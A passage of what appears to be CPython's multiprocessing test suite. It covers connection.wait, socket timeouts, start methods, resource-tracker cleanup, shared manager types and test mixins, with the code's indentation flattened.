self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork() preserves only the calling thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
self.assertEqual(sio.getvalue(), 'foo')
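# A minimal sketch (documented multiprocessing.connection.wait API) of the
# pattern the TestWait cases below rely on: wait() blocks until at least
# one of the given connections, sockets, or process sentinels is ready and
# returns the ready subset.
#
#   from multiprocessing.connection import wait
#   ready = wait([conn_a, conn_b, proc.sentinel], timeout=5)
#   for obj in ready:
#       ...                    # recv() from connections, reap processes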
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((socket_helper.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['spawn', 'fork'] or
methods == ['fork', 'spawn', 'forkserver'] or
methods == ['spawn', 'fork', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing a process does not leak named resources such as
# semaphores and shared memory segments
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
            'objects'.format(rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
support.wait_process(pid, exitcode=-signal.SIGKILL)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
# The pid should be None in the child process, except for the fork
# context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
def test_close(self):
queue = multiprocessing.SimpleQueue()
queue.close()
# closing a queue twice should not fail
queue.close()
# Test specific to CPython since it tests private attributes
@test.support.cpython_only
def test_closed(self):
queue = multiprocessing.SimpleQueue()
queue.close()
self.assertTrue(queue._reader.closed)
self.assertTrue(queue._writer.closed)
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
@hashlib_helper.requires_hashdigest('md5')
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="RLock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
support.print_warning('Shared objects which still exist '
'at manager shutdown:')
support.print_warning(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
if type_ == 'manager':
Temp = hashlib_helper.requires_hashdigest('md5')(Temp)
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
